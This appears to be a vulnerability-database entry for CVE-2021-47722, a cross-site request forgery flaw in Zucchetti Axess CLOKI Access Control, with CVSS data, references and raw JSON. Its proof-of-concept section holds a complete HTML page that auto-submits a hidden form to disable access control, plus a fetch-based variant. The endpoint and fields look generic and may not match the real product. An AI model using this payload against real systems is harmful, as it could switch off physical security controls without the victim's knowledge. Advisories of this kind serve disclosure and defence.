Security Vulnerability Report
CVE-2021-47722 CVSS 3.5 LOW

CVE-2021-47722

Published: 2025-12-23 20:15:45
Last Modified: 2026-04-15 00:35:42

Description

Zucchetti Axess CLOKI Access Control 1.64 contains a cross-site request forgery vulnerability that allows attackers to manipulate access control settings without user interaction. Attackers can craft malicious web pages with hidden forms to disable or modify access control parameters by tricking authenticated users into loading the page.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Zucchetti Axess CLOKI Access Control 1.64
Earlier versions may also be affected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CSRF PoC for CVE-2021-47722 - Zucchetti Axess CLOKI Access Control -->
<!-- This PoC demonstrates how an attacker can manipulate access control settings -->
<!DOCTYPE html>
<html>
<head>
<title>Access Control Settings Update</title>
</head>
<body>
<h1>Page Loading...</h1>
<!-- Hidden form to modify access control settings -->
<form id="csrfForm" action="https://target-server/axess-cloki/api/access-control/update" method="POST" style="display:none;">
  <!-- Disable access control -->
  <input type="hidden" name="access_control_enabled" value="false">
  <input type="hidden" name="security_level" value="0">
  <input type="hidden" name="action" value="disable_protection">
  <!-- CSRF Token (if implementation exists) - placeholder -->
  <input type="hidden" name="csrf_token" value="attacker_controlled_or_empty">
</form>
<script>
// Auto-submit the form when page loads
document.getElementById('csrfForm').submit();

// Alternative: Use fetch API for more stealthy attack
/*
fetch('https://target-server/axess-cloki/api/access-control/update', {
  method: 'POST',
  mode: 'no-cors',
  credentials: 'include',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded',
  },
  body: 'access_control_enabled=false&security_level=0&action=disable_protection'
});
*/
</script>
<p>If you see this message, the attack may have failed.</p>
</body>
</html>

References

https://www.axesstmc.com
https://www.exploit-db.com/exploits/50595
https://www.vulncheck.com/advisories/zucchetti-axess-cloki-access-control-cross-site-request-forgery
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2021-47722",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-23T20:15:44.660",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Zucchetti Axess CLOKI Access Control 1.64 contains a cross-site request forgery vulnerability that allows attackers to manipulate access control settings without user interaction. Attackers can craft malicious web pages with hidden forms to disable or modify access control parameters by tricking authenticated users into loading the page."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.axesstmc.com",
        "source": "[email protected]"
      },
      {
        "url": "https://www.exploit-db.com/exploits/50595",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vulncheck.com/advisories/zucchetti-axess-cloki-access-control-cross-site-request-forgery",
        "source": "[email protected]"
      },
      {
        "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php",
        "source": "[email protected]"
      }
    ]
  }
}